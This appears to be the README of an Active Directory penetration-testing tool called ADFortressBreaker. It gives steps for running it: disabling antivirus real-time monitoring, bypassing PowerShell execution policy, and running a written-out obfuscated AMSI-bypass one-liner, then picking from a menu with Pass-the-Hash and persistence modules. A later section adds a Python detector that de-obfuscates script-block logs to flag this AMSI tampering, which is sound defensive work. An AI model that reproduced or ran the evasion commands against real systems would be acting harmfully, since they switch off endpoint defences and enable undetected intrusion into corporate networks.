The script was written to help ethical hackers run the most common commands of a penetration test in an Active Directory environment without writing a single line of code. It is designed to leave as few traces as possible, so all modules are loaded directly into memory to avoid defender interception. Remember that the modules inside the Modules folder will trigger your antivirus, so before using the script you have to disable real-time monitoring or add an exclusion for the path where you will use it.
Before launching ADFortressBreaker, it is necessary to bypass the PowerShell execution policy:
powershell -ep bypass
Then you have to bypass the AMSI control:
S`eT-It`em ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x') ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( Get-varI`A`BLE ( ('1Q'+'2U') +'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )
Import the module:
. .\ADFortressBreaker.ps1
Execute:
Invoke-ADFortressBreaker
After that, the user has to start a web server on port 8000 on their machine.
_____ ______ _ ____ _
/\ | __ \| ____| | | | _ \ | |
/ \ | | | | |__ ___ _ __| |_ _ __ ___ ___ ___| |_) |_ __ ___ __ _| | _____ _ __
/ /\ \ | | | | __/ _ \| '__| __| '__/ _ \/ __/ __| _ <| '__/ _ \/ _ | |/ / _ \ '__|
/ ____ \| |__| | | | (_) | | | |_| | | __/\__ \__ \ |_) | | | __/ (_| | < __/ |
/_/ \_\_____/|_| \___/|_| \__|_| \___||___/___/____/|_| \___|\__,_|_|\_\___|_|
1) Reconnaissance
2) Enumeration
3) PassTheHash
4) Persistence
5) Exit
[*] Start a web server on your machine (exposed on port 8000) to download the .ps1 file
[*} Example: python3 -m http.server
[*] Set the web server ip address :
In the main menu, the user can choose the activity to perform by typing the corresponding number and pressing Enter.
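For the blue team in the same engagement: the AMSI step above hides its type and field names behind backticks, string concatenation and the -f format operator, so a plain keyword search of PowerShell script block logs will not match it. The following is an added example, not part of ADFortressBreaker; it assumes the input is ScriptBlockText taken from Event ID 4104 records, and all function and variable names in it are hypothetical.

```python
import re

# Strings the AMSI one-liner on this page resolves to once de-obfuscated.
INDICATORS = ("amsiinitfailed", "system.management.automation.amsiutils")

_CONCAT = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")   # 'ab' + 'cd'
_PAREN = re.compile(r"\(\s*('[^']*')\s*\)")            # ('abcd')
# "{1}{0}" -f 'x','y' ; the lookahead waits until every argument is a literal
_FORMAT = re.compile(
    r"""["']((?:\{\d+\})+)["']\s*-f\s*((?:'[^']*'\s*,\s*)*'[^']*')(?!\s*,)""",
    re.I)

def _apply_format(match):
    args = re.findall(r"'([^']*)'", match.group(2))
    order = [int(i) for i in re.findall(r"\{(\d+)\}", match.group(1))]
    if max(order) >= len(args):
        return match.group(0)          # malformed expression: leave as logged
    return "'" + "".join(args[i] for i in order) + "'"

def normalize(script_text):
    """Heuristically undo backtick, concatenation and -f string obfuscation."""
    text = script_text.replace("`", "")
    previous = None
    while previous != text:            # repeat until nothing more collapses
        previous = text
        text = _CONCAT.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", text)
        text = _PAREN.sub(r"\1", text)
        text = _FORMAT.sub(_apply_format, text)
    return text

def amsi_tamper_indicators(script_text):
    """Return the indicator strings present after normalization."""
    lowered = normalize(script_text).lower()
    return [ind for ind in INDICATORS if ind in lowered]

# Constructed ScriptBlockText samples: [0] and [1] are fragments of the
# one-liner shown on this page, [2] uses its backtick style, [3] is benign.
SAMPLES = [
    r'''"{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile')''',
    r'''"{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em')''',
    r'''$f = "amsi`Init`Failed"''',
    r'''Write-Output ('Back' + 'up') ; '{1}{0}' -f 'done','job ' ''',
]
```

Stripping every backtick is a heuristic that also removes legitimate escape sequences, so treat a hit as a lead for review of the full script block rather than as a verdict.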
To implement ADFortressBreaker we used the following tools:
This project is licensed under the Commons Clause version of the MIT License. You can copy, modify, distribute and perform the work for whatever reason, excluding commercial purposes.